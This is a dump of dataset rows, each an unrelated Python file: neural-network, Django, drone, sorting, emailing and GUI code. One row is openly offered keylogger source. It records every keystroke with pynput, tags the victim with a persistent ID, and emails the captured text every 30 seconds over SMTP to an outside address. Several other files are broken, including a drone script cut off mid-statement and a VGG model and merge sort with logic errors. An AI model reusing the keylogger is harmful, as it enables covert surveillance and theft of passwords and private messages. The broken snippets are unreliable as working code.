18,382 | d6a4d8b9df3619dbf0b7d8300ec2ea4fd7a56d5b | import torch
import torch.nn as nn
class Vgg16(nn.Module):
def __init__(self):
super().__init__()
self.conv0 = nn.Sequential(
nn.Conv2d(in_channels=3, out_channels=64,
kernel_size=3, stride=1),
nn.BatchNorm2d(out_channels=64),
nn.ReLU(),
nn.Conv2d(in_channels=64, out_channels=64,
kernel_size=3, stride=1),
nn.BatchNorm2d(out_channels=64),
nn.ReLU()
)
self.pool0 = nn.MaxPool2d(kernel_size=2, stride=2)
self.conv1 = nn.Sequential(
nn.Conv2d(in_channels=64, out_channels=128,
kernel_size=3, stride=1),
nn.BatchNorm2d(out_channels=128),
nn.ReLU(),
nn.Conv2d(in_channels=128, out_channels=128,
kernel_size=3, stride=1),
nn.BatchNorm2d(out_channels=128),
nn.ReLU()
)
self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2)
self.conv2 = nn.Sequential(
nn.Conv2d(in_channels=128, out_channels=256,
kernel_size=3, stride=1),
nn.BatchNorm2d(out_channels=256),
nn.ReLU(),
nn.Conv2d(in_channels=256, out_channels=256,
kernel_size=3, stride=1),
nn.BatchNorm2d(out_channels=256),
nn.ReLU(),
nn.Conv2d(in_channels=256, out_channels=256,
kernel_size=3, stride=1),
nn.BatchNorm2d(out_channels=256),
nn.ReLU()
)
self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2)
self.conv3 = nn.Sequential(
nn.Conv2d(in_channels=256, out_channels=512,
kernel_size=3, stride=1),
nn.BatchNorm2d(out_channels=512),
nn.ReLU(),
nn.Conv2d(in_channels=512, out_channels=512,
kernel_size=3, stride=1),
nn.BatchNorm2d(out_channels=512),
nn.ReLU(),
nn.Conv2d(in_channels=512, out_channels=512,
kernel_size=3, stride=1),
nn.BatchNorm2d(out_channels=512),
nn.ReLU()
)
self.pool3 = nn.MaxPool2d(kernel_size=2, stride=2)
self.conv4 = nn.Sequential(
nn.Conv2d(in_channels=512, out_channels=512,
kernel_size=3, stride=1),
nn.BatchNorm2d(out_channels=512),
nn.ReLU(),
nn.Conv2d(in_channels=512, out_channels=512,
kernel_size=3, stride=1),
nn.BatchNorm2d(out_channels=512),
nn.ReLU(),
nn.Conv2d(in_channels=512, out_channels=512,
kernel_size=3, stride=1),
nn.BatchNorm2d(out_channels=512),
nn.ReLU()
)
self.pool4 = nn.MaxPool2d(kernel_size=2, stride=2)
self.fc0 = nn.Sequential(
nn.Linear(7*7*512, 4096),
nn.BatchNorm2d(4096),
nn.ReLU()
)
self.fc1 = nn.Sequential(
nn.Linear(4096, 4096),
nn.BatchNorm2d(4096),
nn.ReLU()
)
self.final = nn.Linear(4096, 1000)
def forward(self, x):
x = self.conv0(x)
x = self.pool0(x)
x = self.conv1(x)
x = self.pool1(x)
x = self.conv2(x)
x = self.pool2(x)
x = self.conv3(x)
x = self.pool4(x)
x = self.conv4(x)
net_features = self.pool4(x)
x = net_features.view(x.size(0), -1)
x = self.fc0(x)
x = self.fc1(x)
x = self.final(x)
return net_features, x
|
18,383 | c82e83d58a6a6d89c989750731b24b0551ed66e9 | class valueTooSmallException(Exception):
pass
class valueTooLargeException(Exception):
pass
class wrongCodeLength(Exception):
pass
class numberOutOfRange(Exception):
pass |
18,384 | 786955999d3c9bf216743f0349103903675f6a34 | import RPi.GPIO as GPIO
class LedController:
def __init__(self, pinNum, name):
self.pin = pinNum
self.name = name
print("Initializing LED for {} on pin {}".format(self.name, self.pin))
GPIO.setup(self.pin, GPIO.OUT)
GPIO.output(self.pin, False)
def turnOn(self):
print( " Turning {} LED on".format( self.name))
GPIO.output(self.pin, True)
def turnOff(self):
print(" Turning {} LED off".format( self.name))
GPIO.output(self.pin, False)#
def teardown(self):
print("Tearing down {} LED".format( self.name))
self.turnOff()
|
18,385 | 68394153f3dfea0b4484ada22364439f66511cfd | import cv2, time, ps_drone, math, sys
import numpy as numpy
from PIL import Image, ImageTk
drone = ps_drone.Drone()
IMC = drone.VideoImageCount
drone.startup()
drone.reset()
drone.trim()
time.sleep(2)
centered = False
average = 0
counter = 0
prevAngle = 0
landed = False
def loop():
global IMC
global counter
global average
global centered
global prevAngle
global landed
while landed == False:
while drone.VideoImageCount == IMC:
time.sleep(0.01)
IMC = drone.VideoImageCount
frame = drone.VideoImage
alt = drone.NavData["demo"][3]
cx = 0
cy = 0
r = 0
area = 0
area, x , y, radius = circle_detect(frame)
if x != -1
def setup(drone):
drone.startup()
drone.reset()
drone.trim()
time.sleep(2)
while (drone.getBattery()[0] == -1): time.sleep(0.1)
print "Battery: "+str(drone.getBattery()[0])+"% "+str(drone.getBattery()[1])
drone.useDemoMode(True)
drone.setConfigAllID()
drone.sdVideo()
drone.groundCam()
CDC = drone.ConfigDataCount
while CDC == drone.ConfigDataCount: time.sleep(0.0001)
print "Taking off..."
drone.takeoff()
time.sleep(5)
drone.hover()
drone.startVideo()
drone.getNDpackage(["demo"])
loop()
|
18,386 | e0c2a0c6b79d118633d9d3d15b35cf58c84abb2c | __author__ = 'julius'
from django.urls import path
from . import views
urlpatterns = [
path('', views.expense_index,name='expenses'),
path('add', views.expense_add,name='expense_add'),
path('edit/<int:id>', views.expense_edit,name='expense_edit'),
path('<int:id>', views.expense_detail,name='expense'),
] |
18,387 | 263a2db8db7fd113714ef0adc44b28a910096b13 | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-06-13 14:59
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('radiosite', '0012_auto_20170609_1641'),
]
operations = [
migrations.AddField(
model_name='anuncio',
name='imagem_produto_1',
field=models.FileField(blank=True, null=True, upload_to=''),
),
migrations.AddField(
model_name='anuncio',
name='imagem_produto_2',
field=models.FileField(blank=True, null=True, upload_to=''),
),
migrations.AddField(
model_name='anuncio',
name='imagem_produto_3',
field=models.FileField(blank=True, null=True, upload_to=''),
),
]
|
18,388 | 6574e65f85e622277fe9a4be863fa6bcc35c6e37 | import pandas as pd
def load():
filename = "housing/zillow_housing_2020.csv"
df = pd.read_csv(filename)
df.loc[:, "fips"] = df.fips.astype(str).str.zfill(2)
data = {
"df": df,
"keys": ["state", "fips"],
}
data["types"] = {
col: float for col in data["df"].columns if col not in ("state", "fips")
}
return data
|
18,389 | 13bbb0cb7ebf71d34ceadb659cca4dd7e94621e8 | import json
from PIL import Image
import base64
'''
820,827,1559,827,1559,930,820,930,textline
2846,850,3188,850,3188,947,2846,947,textline
3281,879,3572,879,3572,934,3281,934,textline
'''
#data=[820,827,1559,827,1559,930,820,930]
img=Image.open('./IMG_6550.JPG')
(h,w)=img.size
with open('./IMG_6550.JPG','rb') as f1:
base64_data = base64.b64encode(f1.read())
with open('./IMG_6550.txt')as f:
x1=[]
x2=[]
x3=[]
x4=[]
t=[]
lines=f.readlines()
for line in lines:
line=line.strip()
words=line.split(',')
x1.append([float(words[0]),float(words[1])])
x2.append([float(words[2]),float(words[3])])
x3.append([float(words[4]),float(words[5])])
x4.append([float(words[6]),float(words[7])])
t.append(words[8])
jsontext={'shapes':[]}
for i in range(len(x1)):
jsontext['version']='4.2.10'
jsontext['flags']={}
#jsontext['shapes']=
jsontext['shapes'].append({'label':t[i],'points':[x1[i],x2[i],x3[i],x4[i]],'shape_type': 'polygon','flags': {},"group_id": None,})
jsontext['imagePath']='IMG_6550.JPG'
jsontext['imageData']=str(base64_data)
jsontext['imageHeight']=int(h)
jsontext['imageWidth']=int(w)
jsondata = json.dumps(jsontext,indent=2,separators=(',',': '))
f=open('filename.json','w')
f.write(jsondata)
f.close()
|
18,390 | 3958d0a1647cd07cfe14be26e8722ef9babd3291 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2016, Silvio Peroni <essepuntato@gmail.com>
#
# Permission to use, copy, modify, and/or distribute this software for any purpose
# with or without fee is hereby granted, provided that the above copyright notice
# and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT,
# OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE,
# DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS
# SOFTWARE.
__author__ = 'essepuntato'
import argparse
import os
import re
import shutil
import json
from reporter import Reporter
from rdflib import ConjunctiveGraph
def load(cur_graph, rdf_file_path, tmp_dir=None):
if os.path.isfile(rdf_file_path):
try:
cur_graph = __load_graph(cur_graph, rdf_file_path)
except IOError:
if tmp_dir is not None:
current_file_path = tmp_dir + os.sep + "tmp_rdf_file_create_nq.rdf"
shutil.copyfile(rdf_file_path, current_file_path)
try:
cur_graph = __load_graph(cur_graph, current_file_path)
except IOError as e:
reperr.add_sentence("It was impossible to handle the format used for "
"storing the file (stored in the temporary path) '%s'. "
"Additional details: %s"
% (current_file_path, str(e)))
os.remove(current_file_path)
else:
reperr.add_sentence("It was impossible to try to load the file from the "
"temporary path '%s' since that has not been specified in "
"advance" % rdf_file_path)
else:
reperr.add_sentence("The file specified ('%s') doesn't exist."
% rdf_file_path)
return cur_graph
def __load_graph(current_graph, file_path):
errors = ""
try:
with open(file_path) as f:
json_ld_file = json.load(f)
if isinstance(json_ld_file, dict):
json_ld_file = [json_ld_file]
for json_ld_resource in json_ld_file:
# Trick to force the use of a pre-loaded context if the format
# specified is JSON-LD
cur_context = json_ld_resource["@context"]
json_ld_resource["@context"] = context_json
current_graph.parse(data=json.dumps(json_ld_resource), format="json-ld")
return current_graph
except Exception as e:
errors = " | " + str(e) # Try another format
raise IOError("It was impossible to handle the format used for storing the file '%s'%s" %
(file_path, errors))
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser("create_nq.py",
description="This script create an nt file given a directory containing json-ld files.")
arg_parser.add_argument("-i", "--input", dest="input", required=True,
help="The directory containing the json-ld data.")
arg_parser.add_argument("-o", "--output", dest="output", required=True,
help="The output file.")
arg_parser.add_argument("-t", "--tmp_dir", dest="tmp_dir",
help="The directory for easing the RDF loading.")
arg_parser.add_argument("-c", "--context", dest="context", required=True,
help="The JSON-LD context to use.")
args = arg_parser.parse_args()
with open(args.context) as f:
context_json = json.load(f)
repok = Reporter(True, prefix="[create_nq.py: INFO] ")
reperr = Reporter(True, prefix="[create_nq.py: ERROR] ")
repok.new_article()
reperr.new_article()
for cur_dir, cur_subdir, cur_files in os.walk(args.input):
with open(args.output, 'a') as f:
for cur_file in cur_files:
if cur_file.endswith(".json"):
cur_g = ConjunctiveGraph()
cur_g = load(cur_g, cur_dir + os.sep + cur_file, args.tmp_dir)
nt_strings = cur_g.serialize(format="nquads")
f.write(nt_strings)
repok.add_sentence("Done.")
if not reperr.is_empty():
reperr.write_file("create_nq.rep.%s.err.txt" % (
re.sub("_+", "_", re.sub("[\.%s/]" % os.sep, "_", args.input))))
|
18,391 | 879571cbb421227bf70fb66f6eaa131d041aad47 | import art_cli.artifactory_api as artifactory_api
import art_cli.artifactory_cli as artifactory_cli
__all__ = ["artifactory_api", "artifactory_cli"] |
18,392 | b8189b54d0159a0e1558628b0adc2db345bf8e39 | # runner.GlobalSetting
# for stress test
import os
import sys
ITERATION = 0 # integer type,0 means don't iterate
RUNTIME = 0 # integer type,total run time(seconds),default is 0 ,means don't limit
#===============================================================================
# NEEDREPORTS means that it will produce report for every iteration
# if you run stress testing that only includes one test case
# suggest you set it False
#===============================================================================
NEEDREPORTS = True
AUTOMATIONOPENREPORT = False
REPORTERROOTPATH = 'reports' + os.sep
SENDMAILFLAG = False
# specify test range
TESTCASEID_RANGE_FLAG = False # True or False
# TEST CASE ID RANGE:0 means the first test case,and -1 means the last one
TESTCASEID_START = '1' # string type,like TESTCASEID_START = '001'
TESTCASEID_END = '5' # Don't include the testcaseid itself
# specify sheet name list will be tested, [] means all of sheet
SHEETS = ['lianxiang_test1'] # e.g. ['DDD', 'DDD']
def setTestcaseId_Range_Flag(param):
global TESTCASEID_RANGE_FLAG # Testcaseid_Range_Flag
TESTCASEID_RANGE_FLAG = param
def setTestcaseIdRange(begin, end):
global TESTCASEID_START, TESTCASEID_END # Testcaseid_Start
TESTCASEID_START = begin
TESTCASEID_END = end
def getEncoding():
encoding = 'gb2312'
if sys.getfilesystemencoding().lower() == 'utf-8':
encoding = 'UTF-8'
return encoding
def init():
global ITERATION, RUNTIME, NEEDREPORTS
ITERATION = 1
RUNTIME = 0
NEEDREPORTS = True
global SHEETS
SHEETS = []
# test method
if __name__ == '__main__':
#init()
print ITERATION
print getEncoding()
|
18,393 | 98da0d6edd50b967910b0d92f9ab7f725fb73614 | # 归并排序
def merge_sort_c(data_list, p, q):
"""
递归调用
"""
# 退出条件
if p + 1 >= q: # 只有两个元素的时候退出
return
else:
r = (p + q) // 2 # 中间位置下标
merge_sort_c(data_list, p, r)
merge_sort_c(data_list, r, q)
merge(data_list, p, r, q) # 将data_list[p:r] 与 data_list[r:q] 按顺序归并到 data_list 相应位置
def merge(data_list, p, r, q):
"""
归并函数
例如 data_list[p:q] = [...,1,4,2,3,...]
data_list[p:r] = [1,4]
data_list[r:q] = [2,3]
tmp = [1,2,3,4]
归并后 data_list[p:q] = [...,1,2,3,4,...]
"""
tmp = []
i = p
j = r
while i < r and j < q:
if data_list[i] <= data_list[j]:
tmp.append(data_list[i])
i += 1
else:
tmp.append(data_list[j])
j += 1
while i < r:
tmp.append(data_list[i])
i += 1
while j < q:
tmp.append(data_list[j])
j += 1
# 将 tmp 数据复制到 data_list
# for tmp_index, index in enumerate(range(p, q)):
# data_list[index] = tmp[tmp_index]
for m, n in enumerate(tmp):
data_list[p+m] = tmp[m]
if __name__ == "__main__":
a = [4, 7, 2, 8, 9, 21]
merge_sort_c(a, 0, len(a) - 1)
print(a)
|
18,394 | e81aba44b85c6b78e75fbd888b634fc29f5c35e7 | from .coda import Coda, Document, Table, Row, Column, Cell
|
18,395 | 764211c6a25f022a2c02565745e1f99f24459bc0 | from pynput.keyboard import Listener
import os
import time
import _thread
import tempfile
import uuid
import smtplib, ssl
from email.message import EmailMessage
# Temp Content Path
logFile = 'data.txt'
# Victim Unique ID
unique_id_file = tempfile.gettempdir() + '/kl_unique_id.bin'
client_unique_id = None
indexer = 1
# Keyboard Buffer
buffer = []
# SMTP Settings
smtp_server = "smtp.gmail.com"
smtp_port = 587
sender_email = "foo@provider"
smtp_password = "fooPassword"
destination_address = "foo_destination@provider"
def send_buffer_to_email():
print("[+] send_buffer_to_email enter")
while True:
time.sleep(30)
# Create a secure SSL context
context = ssl.create_default_context()
global buffer
global indexer
# Try to log in to server and send email
try:
server = smtplib.SMTP(smtp_server, smtp_port)
server.ehlo() # Can be omitted
server.starttls(context=context) # Secure the connection
server.ehlo() # Can be omitted
server.login(sender_email, smtp_password)
msg = EmailMessage()
msg.set_content(''.join(buffer))
if len(buffer) > 1000000:
# Reset Buffer
buffer = []
indexer = 1
else:
indexer += 1
msg['Subject'] = f'{client_unique_id} - Event ID: {indexer}'
msg['From'] = sender_email
msg['To'] = destination_address
server.send_message(msg)
print("[*] Send Mail OK")
except Exception as e:
print(e)
finally:
server.quit()
def init_unique_client_id():
'''Initializes the Unique Client ID.'''
print("[+] init_unique_client_id enter")
global client_unique_id
if not os.path.exists(unique_id_file):
client_unique_id = uuid.uuid4().hex.upper()
with open(unique_id_file, 'w') as file:
file.write(client_unique_id)
file.flush()
os.fsync(file.fileno())
file.close()
else:
with open(unique_id_file, 'r') as file:
client_unique_id = file.read()
file.close()
print("[+] MY ID=" + client_unique_id)
def write_to_disk():
print("[+] write_to_disk enter")
while True:
with open(logFile, "w") as file:
file.write(''.join(buffer))
file.flush()
os.fsync(file.fileno())
file.close()
time.sleep(1)
def writeLog(key):
'''Dumps Buffer to File'''
translate_keys = {
"Key.space": " ",
"Key.shift_r": "<SHIFT_R>",
"Key.shift_l": "<SHIFT_L>",
"Key.shift": "<SHIFT>",
"Key.enter": "\n",
"Key.alt_l": "<ALT_L>",
"Key.alt_r": "<ALT_R>",
"Key.ctrl_l": "<CTRL_L>",
"Key.ctrl_r": "<CTRL_R>",
"Key.ctrl": "<CTRL>",
"Key.esc": "<ESC>",
"Key.cmd": "<CMD>",
"Key.caps_lock": "<TOGGLE_CAPS_LOCK>",
"Key.tab": "<TAB>",
"Key.backspace": "<BACKSPACE>",
"Key.end": "<END>",
"Key.down": "<DOWN>",
"Key.up": "<UP>",
"Key.right": "<RIGHT>",
"Key.left": "<LEFT>",
"Key.num_lock": "<NUM_LOCK>",
"Key.caps_lock": "<CAPS_LOCK>",
}
keydata = str(key)
keydata = keydata.replace("'", "")
for key in translate_keys:
keydata = keydata.replace(key, translate_keys[key])
buffer.append(keydata)
def __main__():
init_unique_client_id()
_thread.start_new_thread(write_to_disk, ())
_thread.start_new_thread(send_buffer_to_email, ())
# Start Listener
with Listener(on_press=writeLog) as l:
l.join()
if __name__ == '__main__':
print('''
_______ _ ____ ___ _ _
|__ __|| | |___ \ / _ \ | | | |
| | | |__ __) | | | | || |__ ___ ___ _ __ __ __ __ _ | |_ ___ _ __
| | | '_ \ |__ < | | | || '_ \ / __| / _ \| '__|\ \ / // _` || __|/ _ \ | '__|
| | | | | | ___) | | |_| || |_) |\__ \| __/| | \ V /| (_| || |_| (_) || |
|_| |_| |_||____/ \___/ |_.__/ |___/ \___||_| \_/ \__,_| \__|\___/ |_|
_ __ _
| |/ / | |
| ' / ___ _ _ | | ___ __ _ __ _ ___ _ __
| < / _ \| | | || | / _ \ / _` | / _` | / _ \| '__|
| . \| __/| |_| || |____| (_) || (_| || (_| || __/| |
|_|\_\\___| \__, ||______|\___/ \__, | \__, | \___||_|
__/ | __/ | __/ |
|___/ |___/ |___/
''')
__main__()
|
18,396 | 2f66cd80dc0764a996f4bddc2b4a3c83779de2c4 | import pandas
import matplotlib.pyplot as plt
from sklearn import model_selection
from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
# load dataset
url = "/Users/HP/Desktop/S4/Machine Learning/Dataset/pima-indians-diabetes.csv"
names = ['preg', 'plas', 'pres', 'skin', 'test', 'mass', 'pedi', 'age', 'class']
dataframe = pandas.read_csv(url, names=names)
array = dataframe.values
X = array[:,0:8]
Y = array[:,8]
# prepare configuration for cross validation test harness
seed = 7
# prepare models
models = []
models.append(('KNN', KNeighborsClassifier()))
models.append(('CART', DecisionTreeClassifier()))
models.append(('NB', GaussianNB()))
models.append(('SVM', SVC()))
# evaluate each model in turn
results = []
names = []
scoring = 'accuracy'
print('Algorithm Comparison(accuracy)')
for name, model in models:
kfold = model_selection.KFold(n_splits=10, random_state=None)
cv_results = model_selection.cross_val_score(model, X, Y, cv=kfold, scoring=scoring)
results.append(cv_results)
names.append(name)
msg = "%s: %f (%f)" % (name, cv_results.mean(), cv_results.std())
print(msg)
|
18,397 | e736d164423b1dbc6c35207bc9b5e2fd27bd78b8 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 23 23:13:48 2018
@author: fubao
"""
# 75. Sort Colors
#facebook
'''
Given an array with n objects colored red, white or blue, sort them so that objects of the same color are adjacent, with the colors in the order red, white and blue.
Here, we will use the integers 0, 1, and 2 to represent the color red, white, and blue respectively.
Note:
You are not suppose to use the library's sort function for this problem.
'''
class Solution(object):
def sortColors(self, nums):
"""
:type nums: List[int]
:rtype: void Do not return anything, modify nums in-place instead.
"""
'''
#SUCCESS, but not allowedd to use sort function
nums.sort()
'''
'''
#2nd; two pass
'''
'''
A rather straight forward solution is a two-pass algorithm using counting sort.
First, iterate the array counting number of 0's, 1's, and 2's, then overwrite array with total number of 0's, then 1's and followed by 2's.
Could you come up with an one-pass algorithm using only constant space?
'''
'''
d = {}
for n in nums:
if n not in d:
d[n] = 1
else:
d[n] += 1
print('d ', d)
i = 0
if 0 in d:
while(d[0]):
nums[i] = 0
i += 1
d[0] -= 1
if 1 in d:
while(d[1]):
nums[i] = 1
i += 1
d[1] -= 1
if 2 in d:
while(d[2]):
nums[i] = 2
i += 1
d[2] -= 1
'''
#so what's the point of this question here? using one pass? o(1) space? how
'''
这里要求one pass完成排序,需要利用只有数组元素只有3个数的特性,否则无法完成。排序完成后一定是0...01...12....2,所以可以扫描数组,
当遇到0时,交换到前部,当遇到1时,交换到后部。用双指针left, right来记录当前已经就位的0序列和2序列的边界位置。
假设已经完成到如下所示的状态:
0......0 1......1 x1 x2 .... xm 2.....2
| | |
left cur right
(1) A[cur] = 1:已经就位,cur++即可
(2) A[cur] = 0:交换A[cur]和A[left]。由于A[left]=1或left=cur,所以交换以后A[cur]已经就位,cur++,left++
(3) A[cur] = 2:交换A[cur]和A[right],right--。由于交换后的xm的值未知,cur不能增加,继续判断xm。
cur > right扫描结束。
'''
left = 0 #left
right = len(nums)-1 #right
cur = 0
while(cur <= right):
if nums[cur] == 0:
#swap redBound and cur's
nums[left], nums[cur] = nums[cur], nums[left]
cur += 1
left += 1
elif nums[cur] == 2:
nums[right], nums[cur] = nums[cur], nums[right]
right -= 1
else:
cur += 1 |
18,398 | eb3df8715f5d7dd5ae5cfb18d10260c31b684b55 | import pandas as pd
import smtplib
#sender details
your_name = input("Enter your name:")
your_email = input("Enter your Email:")
your_password = input("Enter password:")
#setting up the connection
server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
server.ehlo()
server.login(your_email, your_password)
#file information
file = input("Enter filename")
email_list = pd.read_excel(file)
#getting all the email infos
all_names = email_list['Name']
all_emails = email_list['Email']
all_subjects = email_list['Subject']
all_messages = email_list['Message']
for idx in range(len(all_emails)):
name = all_names[idx]
email = all_emails[idx]
subject = all_subjects[idx]
message = all_messages[idx]+"\nThis is a system generated mail, Please "+name+" do not reply\n"
full_email = ("From: {0} <{1}>\n"
"To: {2} <{3}>\n"
"Subject: {4}\n\n"
"{5}"
.format(your_name, your_email, name, email, subject, message))
try:
server.sendmail(your_email, [email], full_email)
print('Email to {} successfully sent!\n\n'.format(email))
except Exception as e:
print('Email to {} could not be sent :( because {}\n\n'.format(email, str(e)))
server.close()
|
18,399 | 3bd0eee8808ca768efb18de85874700e29731157 | # import all the modules
from tkinter import *
import tkinter.messagebox
import json
from rdflib import Graph, Literal
from app import replace_triple, add_triple, remove_triple, get_all_triples, read_base_json, save_base_json
class Database:
def __init__(self, master, *args, **kwargs):
self.master = master
self.canvas = Canvas(width=1366, height=768, bg='pink')
self.canvas.pack()
self.heading = Label(master, text="Update Triple", font=('Helvetica', 35, 'bold', 'italic'), bg='pink', fg='black')
self.heading.place(x=100, y=0)
# label and entry for id
self.id_le = Label(master, text="Enter ID", font=('Helvetica', 10, 'bold'), bg='pink', fg='black')
self.id_le.place(x=0, y=70)
self.id_leb = Entry(master, font=('Helvetica', 10), width=10)
self.id_leb.place(x=380, y=70)
self.btn_search = Button(master, text="Search", width=8, height=0, bg='sky blue', command=self.search)
self.btn_search.place(x=500, y=70)
# lables for the window
self.first = Label(master, text="Enter Subject", font=('Helvetica', 10, 'bold'), bg='pink', fg='black')
self.first.place(x=0, y=120)
self.last = Label(master, text="Enter Type", font=('Helvetica', 10, 'bold'), bg='pink', fg='black')
self.last.place(x=0, y=170)
self.gender = Label(master, text="Enter Target ", font=('Helvetica', 10, 'bold'), bg='pink', fg='black')
self.gender.place(x=0, y=220)
# enteries for window
self.first = Entry(master, width=25, font=('Helvetica', 10, 'bold'))
self.first.place(x=380, y=120)
self.last = Entry(master, width=25, font=('Helvetica', 10, 'bold'))
self.last.place(x=380, y=170)
self.gender = Entry(master, width=25, font=('Helvetica', 10, 'bold'))
self.gender.place(x=380, y=220)
# button to add to the database
self.btn_add = Button(master, text='Update Triple', width=27, height=1, bg='sky blue', fg='black',
command=self.update)
self.btn_add.place(x=380, y=420)
self.g, self.data = read_base_json('data/dinos.json')
def search(self, *args, **kwargs):
triples = get_all_triples(self.g, self.data)
triple = list()
print(triples)
for item in triples:
if str(item[0]) == self.id_leb.get():
triple = item
break
print(triple)
self.n1 = triple[1]
self.n2 = triple[2]
self.n3 = triple[3]
# inster into the enteries to update
self.first.delete(0, END)
self.first.insert(0, str(self.n1))
self.last.delete(0, END)
self.last.insert(0, str(self.n2))
self.gender.delete(0, END)
self.gender.insert(0, str(self.n3))
def update(self, *args, **kwargs):
triple_new = list()
triple_new.append(self.first.get())
triple_new.append(self.last.get())
triple_new.append(self.gender.get())
triple_old = list()
triple_old.append(self.n1)
triple_old.append(self.n2)
triple_old.append(self.n3)
print(triple_old, triple_new)
replace_triple(self.g, triple_old, triple_new)
tkinter.messagebox.showinfo("Success", "Updated Triple successfully")
save_base_json(self.g, self.data, 'data/dinos.json')
root = Tk()
b = Database(root)
root.geometry("1000x760+0+0")
root.title("Update Triple Information")
root.mainloop()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.